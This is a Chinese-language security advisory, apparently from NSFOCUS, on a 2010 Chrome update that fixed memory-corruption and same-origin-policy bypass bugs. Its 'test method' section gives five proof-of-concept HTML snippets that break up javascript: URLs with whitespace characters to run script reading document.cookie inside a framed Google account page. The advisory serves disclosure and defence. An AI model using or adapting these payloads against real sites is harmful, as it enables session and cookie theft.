安全研究

安全漏洞
Google Chrome 4.1.249.1064更新修复多个安全漏洞

发布日期:2010-04-27
更新日期:2010-05-04

受影响系统:
Google Chrome 4.x
不受影响系统:
Google Chrome 4.1.249.1064
描述:
BUGTRAQ  ID: 39804,39808,39813
CVE ID: CVE-2010-1663,CVE-2010-1664,CVE-2010-1665

Google Chrome是Google发布的开源WEB浏览器。

Chrome的4.1.249.1064版本更新修复了多个安全漏洞,用户受骗访问恶意网页就可能导致拒绝服务、绕过安全限制或完全入侵用户系统。

1) Chrome没有正确地处理字体和HTML5媒体,用户受骗访问了恶意网页就可以触发内存破坏,导致拒绝服务或执行任意代码。

2) Chrome中的Google URL解析库(google-url或GURL)允许攻击者绕过同源策略。

<*来源:Jordi Chancel
        wushi (wooshi@gmail.com
  
  链接:http://secunia.com/advisories/39651
        http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>  

<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>  

----  

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>  

<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>  

----  

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>  

<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>  

----  

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>  

<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>  

----  

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>  

<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>

建议:
厂商补丁:

Google
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.google.com

浏览次数:2234
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客